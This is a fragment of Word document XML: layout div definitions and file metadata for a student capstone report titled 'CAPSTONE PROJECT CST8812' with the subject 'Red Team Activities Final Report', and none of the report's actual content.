    <w:div w:id="1417631174">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1431966870">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1500273449">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1853642942">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19226401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575</TotalTime>
  <Pages>17</Pages>
  <Words>1167</Words>
  <Characters>6653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CAPSTONE PROJECT CST8812</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>7805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CAPSTONE PROJECT CST8812</dc:title>
  <dc:subject>RED TEAM ACTIVITIES FINAL REPORT</dc:subject>
  <dc:creator>Akash Nadackanalvinod</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Akash Nadackanalvinod</cp:lastModifiedBy>
  <cp:revision>191</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-08-05T06:26:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-08-14T06:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>